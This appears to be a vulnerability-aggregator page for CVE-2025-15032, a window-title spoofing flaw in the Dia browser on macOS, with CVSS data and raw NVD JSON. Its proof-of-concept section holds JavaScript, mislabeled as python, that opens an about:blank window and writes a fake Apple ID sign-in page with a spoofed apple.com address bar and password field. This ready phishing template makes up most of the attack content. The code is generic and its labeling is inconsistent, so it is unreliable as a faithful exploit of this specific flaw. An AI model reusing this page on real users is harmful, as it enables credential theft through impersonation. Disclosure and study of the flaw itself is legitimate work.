Security Vulnerability Report
中文
CVE-2025-15032 CVSS 7.4 HIGH

CVE-2025-15032

Published: 2026-01-16 19:16:16
Last Modified: 2026-04-15 00:35:42
Source: 59469e6c-7ea7-446f-8e43-06aa32c115e8

Description

Missing about:blank indicator in custom-sized new windows in Dia before 1.9.0 on macOS could allow an attacker to spoof a trusted domain in the window title and mislead users about the current site.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Dia < 1.9.0 (macOS)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-15032 PoC - Window Title Spoofing // This PoC demonstrates how an attacker can create a custom-sized window // that spoofs a trusted domain in the window title // Create a custom-sized window (key to triggering the vulnerability) const maliciousWindow = window.open( 'about:blank', 'SpoofedWindow', 'width=800,height=600,resizable=yes' ); if (maliciousWindow) { const doc = maliciousWindow.document; // Write HTML content with fake address bar simulation doc.open(); doc.write(` <!DOCTYPE html> <html> <head> <style> body { margin: 0; font-family: Arial, sans-serif; } .fake-address-bar { background: #f0f0f0; padding: 8px; border-bottom: 1px solid #ccc; font-size: 14px; } .fake-url { background: white; padding: 6px 10px; border-radius: 4px; border: 1px solid #ccc; } .fake-content { padding: 40px; text-align: center; } input { padding: 10px; margin: 10px; width: 250px; } button { padding: 10px 20px; background: #0066cc; color: white; border: none; cursor: pointer; } </style> </head> <body> <div class="fake-address-bar"> <span class="fake-url">https://www.apple.com/login</span> </div> <div class="fake-content"> <h2>Apple ID Sign In</h2> <p>Please sign in to your Apple account</p> <form> <input type="text" placeholder="Apple ID" /> <input type="password" placeholder="Password" /> <button type="submit">Sign In</button> </form> </div> </body> </html> `); doc.close(); // The window title can be set to further deceive users maliciousWindow.document.title = 'https://www.apple.com - Sign In'; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15032", "sourceIdentifier": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "published": "2026-01-16T19:16:16.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing about:blank indicator in custom-sized new windows in Dia before 1.9.0 on macOS could allow an attacker to spoof a trusted domain in the window title and mislead users about the current site."}, {"lang": "es", "value": "La falta del indicador about:blank en nuevas ventanas de tamaño personalizado en Dia antes de la versión 1.9.0 en macOS podría permitir a un atacante suplantar un dominio de confianza en el título de la ventana y engañar a los usuarios sobre el sitio actual."}], "metrics": {"cvssMetricV31": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://www.diabrowser.com/security/bulletins#CVE-2025-15032", "source": "59469e6c-7ea7-446f-8e43-06aa32c115e8"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.